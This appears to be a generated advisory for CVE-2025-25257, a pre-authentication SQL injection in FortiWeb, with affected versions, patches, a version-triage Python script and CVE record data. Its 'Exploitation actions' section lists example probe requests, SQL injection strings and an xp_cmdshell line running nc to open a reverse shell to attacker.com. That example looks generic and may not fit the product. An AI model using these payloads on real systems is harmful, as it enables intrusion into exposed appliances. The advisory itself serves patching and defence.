FortiWeb: pre-auth SQL injection leading to remote code execution in FortiWeb (CVE-2025-25257) #shorts

Summary

Welcome to the Security Today podcast. In this episode, we’re unpacking CVE-2025-25257: a critical, pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb web application firewall. Public proof-of-concept code has already surfaced, and multiple customer instances have been compromised. We’ll cover what’s at risk, how the flaw works, and what you need to do to stay safe.

Product details

FortiWeb is Fortinet’s web application firewall and Fabric Connector used to protect web applications from attacks. The vulnerable releases span versions 7.0.0 through 7.0.10, 7.2.0 through 7.2.10, 7.4.0 through 7.4.7, and 7.6.0 through 7.6.3. Fortinet customers often deploy FortiWeb in front of critical web servers and application infrastructures to filter malicious traffic.

Vulnerability type summary

This is an SQL Injection vulnerability (CWE-89) exploitable without authentication, allowing arbitrary SQL commands to be injected via specially crafted HTTP or HTTPS requests. The impact is elevated from data theft to full remote code execution, making it a critical pre-auth RCE flaw.

Details of the vulnerability

Researchers from pwntheplanet first disclosed a proof-of-concept on Reddit, demonstrating how an attacker can send malicious queries to FortiWeb’s HTTP interface to modify backend database calls. By chaining SQL injection with built-in OS command execution routines, an unauthenticated attacker can achieve remote code execution on the appliance. Fortinet confirmed the issue, noting public exploits in the wild and issuing patches in versions 7.0.11, 7.2.11, 7.4.8, and 7.6.4. Multiple customer deployments were breached before patching, underscoring the urgency.

Conclusion

If you manage FortiWeb appliances, update to the latest patched releases immediately. Disable any exposed management interfaces until you’ve applied the fixes. Review your logs for unusual SQL queries or new service processes and rotate any credentials that may have been exposed. That’s it for today’s deep dive—stay secure and join us next time for more vulnerability updates.


Remediation and exploitation details

This chain involves the following actors

  • Unauthenticated attacker: Exploits SQL injection flaw

The following systems are involved

  • FortiWeb (Web application firewall): Vulnerable target

Attack entry point

  • HTTP/HTTPS interface: Web management endpoint parameter susceptible to SQL injection via crafted requests

Remediation actions

  • FortiWeb administrator (target: FortiWeb): Apply published patches for versions 7.0.0–7.0.10, 7.2.0–7.2.10, 7.4.0–7.4.7 and 7.6.0–7.6.3
  • FortiWeb administrator (target: FortiWeb): Upgrade to the fixed releases (7.0.11, 7.2.11, 7.4.8 and 7.6.4, or later)
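Before patching a fleet you need to know which appliances sit inside the four affected ranges. The following Python is an added example, not Fortinet's code: it takes the range entries in the same shape the CVE record below uses, pairs each branch with the fixed release named in the details above (7.0.11, 7.2.11, 7.4.8, 7.6.4), and compares versions numerically, because a plain string comparison sorts 7.2.10 before 7.2.9 and would mis-triage that build. The host inventory at the bottom is constructed, and version strings are assumed to be plain major.minor.patch.

```python
"""Triage FortiWeb release strings against the CVE-2025-25257 affected ranges.

Added example, not Fortinet's code. AFFECTED copies the structure of the
CVE record's "Affected Software Versions" entries; FIXED holds the first
fixed release per branch as quoted in the advisory text.
"""

AFFECTED = [
    {'versionType': 'semver', 'version': '7.6.0', 'lessThanOrEqual': '7.6.3', 'status': 'affected'},
    {'versionType': 'semver', 'version': '7.4.0', 'lessThanOrEqual': '7.4.7', 'status': 'affected'},
    {'versionType': 'semver', 'version': '7.2.0', 'lessThanOrEqual': '7.2.10', 'status': 'affected'},
    {'versionType': 'semver', 'version': '7.0.0', 'lessThanOrEqual': '7.0.10', 'status': 'affected'},
]

# First fixed release per "major.minor" branch (from the advisory text).
FIXED = {"7.6": "7.6.4", "7.4": "7.4.8", "7.2": "7.2.11", "7.0": "7.0.11"}


def parse_version(text):
    """'7.2.10' -> (7, 2, 10). Tuples compare numerically, so (7,2,10) > (7,2,9)
    as it should; comparing the raw strings would get this wrong."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"expected major.minor.patch, got {text!r}")
    return tuple(int(p) for p in parts)


def triage(text):
    """Classify one release string. A version outside every listed range is
    reported as not affected, but 'listed_branch' tells you whether the record
    says anything about that branch at all (e.g. 6.x is simply not covered)."""
    v = parse_version(text)
    branch = f"{v[0]}.{v[1]}"
    for entry in AFFECTED:
        if entry["status"] != "affected":
            continue
        lo = parse_version(entry["version"])
        hi = parse_version(entry["lessThanOrEqual"])
        if lo <= v <= hi:
            return {"version": text, "affected": True, "branch": branch,
                    "upgrade_to": FIXED[branch], "listed_branch": True}
    return {"version": text, "affected": False, "branch": branch,
            "upgrade_to": None, "listed_branch": branch in FIXED}


def triage_inventory(hosts):
    """hosts: {hostname: version}. Returns the affected hostnames, sorted."""
    return sorted(h for h, ver in hosts.items() if triage(ver)["affected"])


if __name__ == "__main__":
    # Constructed inventory for demonstration only.
    inventory = {"waf-dmz-1": "7.4.7", "waf-dmz-2": "7.4.8", "waf-lab": "7.2.3"}
    for host in triage_inventory(inventory):
        print(host, inventory[host], "-> upgrade to", triage(inventory[host])["upgrade_to"])
```

Feed it whatever your asset system exports; the only assumption is the plain three-part version string, so strip build suffixes before calling `triage` if your export includes them.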

Exploitation actions

Passive reconnaissance

  • Unauthenticated attacker (target: FortiWeb): Scan the internet for exposed FortiWeb management endpoints
  • Example: Search for FortiWeb headers via Shodan or similar services

Parameter fuzzing

  • Unauthenticated attacker (target: FortiWeb): Probe suspected endpoints by sending benign and targeted payloads to identify injectable parameters
  • Example: GET /api/v1/ws/sslvpn_websession_list?filter='

Pre-auth SQL injection

  • Unauthenticated attacker (target: FortiWeb): Craft an SQL injection payload designed to extract the database schema or escalate to operating system commands
  • Example: '|| (SELECT version())--

Remote code execution via SQL injection

  • Unauthenticated attacker (target: FortiWeb): Send a malicious HTTP POST containing the SQL payload to the vulnerable API endpoint
  • Example: POST /api/v1/auth HTTP/1.1 Host: target Content-Length: ... username=admin' UNION SELECT ... -- &password=foo

Command injection through database

  • Unauthenticated attacker (target: FortiWeb): Leverage database functions or stored procedures to write and execute system-level commands, achieving full remote code execution
  • Example: EXEC xp_cmdshell 'nc -e /bin/sh attacker.com 4444'

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-25257
Description
An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in Fortinet FortiWeb version 7.6.0 through 7.6.3, 7.4.0 through 7.4.7, 7.2.0 through 7.2.10 and below 7.0.10 allows an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.
Provider
fortinet
CWE / problem types
Execute unauthorized code or commands
Affected Software Versions
Fortinet FortiWeb (semver ranges, all with status "affected"):
  • 7.6.0 through 7.6.3
  • 7.4.0 through 7.4.7
  • 7.2.0 through 7.2.10
  • 7.0.0 through 7.0.10
Date Published
2025-07-17T15:10:04.532Z
Last Updated
2025-07-17T15:31:33.264Z